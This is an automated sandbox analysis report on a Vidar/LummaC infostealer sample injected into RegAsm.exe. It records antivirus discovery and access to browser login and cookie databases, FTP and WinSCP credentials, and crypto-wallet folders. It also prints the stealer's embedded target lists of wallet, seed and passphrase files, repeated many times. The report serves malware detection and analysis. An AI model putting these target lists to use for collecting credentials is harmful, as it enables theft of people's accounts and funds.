Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00410D2E GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,

3_2_00410D2E

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: file.exe, 00000000.00000002.1714302071.0000000000BD2000.00000004.00000020.00020000.00000000.sdmp, BAAEHDBFID.exe, 00000007.00000002.2335677674.00000000014F2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: avp.exe
Source: file.exe, 00000000.00000002.1714302071.0000000000BD2000.00000004.00000020.00020000.00000000.sdmp, BAAEHDBFID.exe, 00000007.00000002.2335677674.00000000014F2000.00000004.00000020.00020000.00000000.sdmp, 66ecb454d2b4a_lgfdsjgds[1].exe.3.dr, BAAEHDBFID.exe.3.dr	Binary or memory string: AVP.exe
Source: RegAsm.exe, 00000003.00000002.2383468411.000000000135A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2383468411.00000000013CB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Yara detected Vidar

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: 3.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.3a05570.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.3a05570.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2383468411.00000000013A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1717289936.0000000003A05000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2383468411.00000000013CB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7412, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7516, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: RegAsm.exe, 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: ethereum.,exodus.,metamask.,myetherwallet.,electrum.,bitcoin.,blockchain.,coinomi.,words.,meta.,mask.,eth.,recovery.\|150\|3\|windows,Program Files,Program Files (x86),AppData,ProgramData,.lnk,.exe,.scr,.com,.pif,.mp3\|DESKTOP\|%DESKTOP%\\|wallet.,seed.,btc.,key.,2fa.,crypto.,coin.,private.,2fa.,auth.,ledger.,trezor.,pass.,wal.,upbit.,bcex.,bithimb.,hitbtc.,bitflyer.,kucoin.,huobi.,poloniex.,kraken.,okex.,binance.,bitfinex.,gdax.,ethereum.,exodus.,metamask.,myetherwallet.,electrum.,bitcoin.,blockchain.,coinomi.,words.,meta.,mask.,eth.,recovery.\|150\|2\|Windows,Program Files,Program Files (x86),AppData,ProgramData,.lnk,.exe,.scr,.com,.pif,*.mp3\|
Source: RegAsm.exe, 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: ets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \Electrum\wallets\
Source: RegAsm.exe, 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: RegAsm.exe	String found in binary or memory: exodus.conf.json
Source: RegAsm.exe	String found in binary or memory: \Exodus\
Source: RegAsm.exe, 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: ets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: ets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: ets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \Ethereum\
Source: RegAsm.exe	String found in binary or memory: \Exodus\
Source: RegAsm.exe, 00000003.00000002.2383468411.00000000013CB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: 104.44Users\user\AppData\Roaming\Binance\simple-storage.jsongw
Source: RegAsm.exe, 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: ethereum.,exodus.,metamask.,myetherwallet.,electrum.,bitcoin.,blockchain.,coinomi.,words.,meta.,mask.,eth.,recovery.\|150\|3\|windows,Program Files,Program Files (x86),AppData,ProgramData,.lnk,.exe,.scr,.com,.pif,.mp3\|DESKTOP\|%DESKTOP%\\|wallet.,seed.,btc.,key.,2fa.,crypto.,coin.,private.,2fa.,auth.,ledger.,trezor.,pass.,wal.,upbit.,bcex.,bithimb.,hitbtc.,bitflyer.,kucoin.,huobi.,poloniex.,kraken.,okex.,binance.,bitfinex.,gdax.,ethereum.,exodus.,metamask.,myetherwallet.,electrum.,bitcoin.,blockchain.,coinomi.,words.,meta.,mask.,eth.,recovery.\|150\|2\|Windows,Program Files,Program Files (x86),AppData,ProgramData,.lnk,.exe,.scr,.com,.pif,*.mp3\|
Source: RegAsm.exe, 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: ets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: ets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: ets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: ets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: keystore
Source: RegAsm.exe, 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: ets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\backups\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Source: Yara match	File source: 00000003.00000002.2383468411.00000000013CB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7516, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Yara detected Vidar

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: 3.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.3a05570.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
